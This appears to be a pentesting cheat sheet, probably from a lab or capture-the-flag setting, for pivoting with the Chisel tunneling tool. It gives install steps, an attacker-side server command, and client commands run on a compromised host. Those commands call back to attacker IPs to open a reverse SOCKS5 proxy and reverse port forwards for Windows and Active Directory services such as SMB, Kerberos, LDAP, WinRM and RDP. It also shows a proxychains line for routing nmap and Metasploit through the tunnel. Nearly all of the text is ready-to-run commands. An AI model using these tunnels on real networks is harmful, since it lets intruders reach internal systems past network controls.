Prerequisites
chiselbinary on the attack machine.chisel.exe(or compatible) on the target/pivot.- Open port on the attacker to accept incoming tunnels.
Install
git clone https://github.com/jpillora/chisel.git
cd chisel
go build
SOCKS5 Mode (Dynamic Proxy)
Attacker (Server)
chisel server -v -p 1234 --socks5 --reverse
-p 1234– listen on port 1234.--socks5– enable SOCKS5 proxy.--reverse– expect reverse connections from clients.
Target (Client)
.\chisel.exe client -v 10.10.14.207:1234 R:1080:socks
- Connects back to
10.10.14.207:1234. - Exposes a SOCKS5 proxy on local port
1080.
Proxychains Configuration for Chisel
Add to /etc/proxychains.conf:
127.0.0.1 socks5 1080
Now Proxychains tools (nmap, msfconsole, firefox, etc.) will use the Chisel SOCKS proxy.
Specific Port Forwards (More Reliable Than Dynamic)
Attacker (Server)
sudo chisel server -v -p 1234 --reverse
LOCAL TARGET
.\chisel.exe client -v 10.10.14.207:1234 R:445:localhost:445 R:88:localhost:88 R:135:localhost:135 R:3268:localhost:3268 R:389:localhost:389 R:636:localhost:636 R:3269:localhost:3269 R:5353:localhost:53 R:464:localhost:464 R:443:localhost:443 R:80:localhost:80 R:5986:localhost:5986 R:123/udp:localhost:123/udp R:139:localhost:139
REMOTE TARGET
./chisel_linux client -v 10.10.15.17:1234 R:445:172.16.5.35:445 R:88:172.16.5.35:88 R:135:172.16.5.35:135 R:3268:172.16.5.35:3268 R:389:172.16.5.35:389 R:636:172.16.5.35:636 R:3269:172.16.5.35:3269 R:5353:172.16.5.35:53 R:464:172.16.5.35:464 R:443:172.16.5.35:443 R:5986:172.16.5.35:5986 R:139:172.16.5.35:139 R:5985:172.16.5.35:5985 R:3389:172.16.5.35:3389
This creates reverse port forwards for multiple common Windows/AD services from the pivot back to the attacker.
Use specific forwards when you know which ports/services you care about and want more predictability than a dynamic SOCKS proxy.